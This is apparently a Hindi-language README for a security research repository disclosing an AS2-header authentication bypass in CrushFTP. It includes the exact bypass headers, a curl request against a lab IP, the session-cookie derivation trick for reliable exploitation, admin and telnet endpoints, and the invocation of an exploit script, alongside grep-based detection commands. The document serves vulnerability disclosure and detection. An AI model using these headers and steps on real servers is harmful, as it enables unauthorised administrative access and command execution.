
निष्कर्ष एवं जुलाई रेस: वाइल्ड में 0day के साथ
⚠️ महत्वपूर्ण: यह भेद्यता नवंबर 2025 तक CrushFTP द्वारा पैच कर दी गई है। यह अनुसंधान केवल शैक्षिक और सुरक्षात्मक उद्देश्यों के लिए प्रकाशित किया गया है।
📝 नोट: यह अनुसंधान CVE-2025-54309 के समान भेद्यता पैटर्न पर आधारित है। सटीक CVE नंबर भिन्न हो सकता है। यह नियंत्रित होम लैब वातावरण में किया गया स्वतंत्र सुरक्षा अनुसंधान है।
यह रिपॉज़िटरी CrushFTP सर्वरों में एक गंभीर प्रमाणीकरण बाईपास भेद्यता का दस्तावेजीकरण करती है जो AS2 (Applicability Statement 2) हेडर हेरफेर के माध्यम से पूर्ण प्रशासनिक पहुंच की अनुमति देती है। इस भेद्यता के लिए कोई प्रमाणीकरण आवश्यक नहीं है और इसे एक ही HTTP अनुरोध से शोषित किया जा सकता है।
मुख्य बिंदु:
अनुसंधानकर्ता: SmileyFace101 (@SmileyFace101)
CrushFTP का वेब इंटरफ़ेस उचित सत्यापन के बिना AS2 प्रोटोकॉल हेडर पर गलत तरीके से भरोसा करता है। सर्वर मान लेता है कि AS2 अनुरोध पहले से प्रमाणित हैं और सामान्य प्रमाणीकरण प्रक्रियाओं को बाईपास कर देता है।
भेद्य CrushFTP संस्करण (लैब में पुष्टि):
पैच किए गए संस्करण:
लैब वातावरण:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
उदाहरण (लैब वातावरण):
curl -H "X-DMZ-Proxy: disabled" \
-H "X-AS2-Version: 1.0" \
-H "User-Agent: AS2Server/1.0" \
"http://10.0.100.50/WebInterface/admin/index.html"
नोट: केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।
शोषण के दौरान, हमने सत्र कुकी निर्माण में एक गणितीय संबंध खोजा जो शोषण को 100% विश्वसनीय बनाता है:
CrushAuth Structure: [TIMESTAMP]_[SESSION_ID]
currentAuth = Last 4 characters of SESSION_ID
c2f parameter = Same as currentAuth value
✅ संपूर्ण सर्वर और उपयोगकर्ता गणना
✅ उपयोगकर्ता खाता निर्माण और संशोधन
✅ फ़ाइल सिस्टम पहुंच और ब्राउज़िंग
✅ टेलनेट इंटरफ़ेस के माध्यम से कमांड निष्पादन
✅ सिस्टम विशेषाधिकारों के साथ जॉब शेड्यूलिंग
✅ PGP कुंजी और प्रमाणपत्र पहुंच
✅ प्रशासनिक कॉन्फ़िगरेशन संशोधन
detection/ निर्देशिका देखें:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
/WebInterface/function/ पर POST अनुरोध# Web server logs
grep -E "(X-DMZ-Proxy|X-AS2-Version|AS2Server)" /var/log/nginx/access.log
# CrushFTP application logs
grep -E "(WebInterface/admin|WebInterface/function)" crushftp.log
.
├── README.md # This file - overview and usage
├── docs/
│ └── TECHNICAL_ANALYSIS.md # Complete technical deep-dive
├── exploits/
│ ├── enhanced_session_exploit.sh # Full exploitation with session mgmt
│ ├── targeted_exploitation.sh # High-value endpoint testing
│ └── adaptive_exploitation.sh # Multi-strategy approach
└── detection/
├── snort_rules.txt # IDS/IPS signatures (Snort)
├── suricata_rules.txt # IDS/IPS signatures (Suricata)
└── log_analysis.sh # Log analysis and IOC detection
दस्तावेज़ पढ़ें:
अपनी लैब में परीक्षण करें:
# Make sure you own the target system!
./exploits/enhanced_session_exploit.sh 10.0.100.50
पहचान तैनात करें:
✅ पूर्ण AS2 प्रमाणीकरण बाईपास खोजा और दस्तावेजित किया गया
✅ महत्वपूर्ण सत्र कुकी निर्माण आवश्यकता की पहचान और समाधान किया गया
✅ सत्र प्रबंधन में गणितीय संबंध रिवर्स-इंजीनियर किया गया
✅ दो-चरणीय शोषण पद्धति विकसित की गई
✅ 100% विश्वसनीय शोषण पैटर्न स्थापित किया गया
✅ कई RCE वेक्टर की पहचान और विश्लेषण किया गया
✅ संपूर्ण JavaScript स्रोत कोड विश्लेषण किया गया
/WebInterface/admin/index.html - मुख्य प्रशासनिक पैनल/WebInterface/admin/telnet.html - टेलनेट इंटरफ़ेस/WebInterface/Jobs/index.html - जॉब प्रबंधन/WebInterface/UserManager/index.html - उपयोगकर्ता प्रबंधन/WebInterface/PGP/index.html - PGP कुंजी प्रबंधन/WebInterface/function/ - प्रशासनिक फ़ंक्शन प्रोसेसरलेखक: SmileyFace101
GitHub: @SmileyFace101
अनुसंधान अवधि: मार्च - जुलाई 2025 (होम लैब)
सार्वजनिक प्रकटीकरण: 6 दिसंबर, 2025
यह अनुसंधान केवल शैक्षिक और सुरक्षात्मक उद्देश्यों के लिए है।
✅ अधिकृत उपयोग:
❌ निषिद्ध:
इस अनुसंधान का उपयोग करके, आप सहमत हैं:
अस्वीकरण: लेखक दुरुपयोग के लिए जिम्मेदार नहीं है। अनधिकृत कंप्यूटर एक्सेस अवैध है।
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें।
अंतिम अपडेट: 6 दिसंबर, 2025
जोखिम आकलन: गंभीर - तत्काल पैचिंग और शमन आवश्यक
अंतिम अपडेट: 6 दिसंबर, 2025
लेखक: SmileyFace101
अनुसंधान आयोजित: अधिकृत लैब वातावरण में मार्च - जुलाई 2025
| सुरक्षा पहलू | प्रभाव स्तर | विवरण |
|---|
| गोपनीयता | 🔴 गंभीर | क्रेडेंशियल्स, कॉन्फ़िग, PGP कुंजियों, लॉग तक पूर्ण पहुंच |
| अखंडता | 🔴 गंभीर | उपयोगकर्ता खाता निर्माण, कॉन्फ़िग परिवर्तन, फ़ाइल संशोधन |
| उपलब्धता | 🟡 उच्च | सिस्टम कमांड निष्पादन, सेवा विघटन क्षमता |
| विशेषाधिकार वृद्धि | 🔴 गंभीर | सीधे व्यवस्थापक पहुंच, स्थायी खाता निर्माण |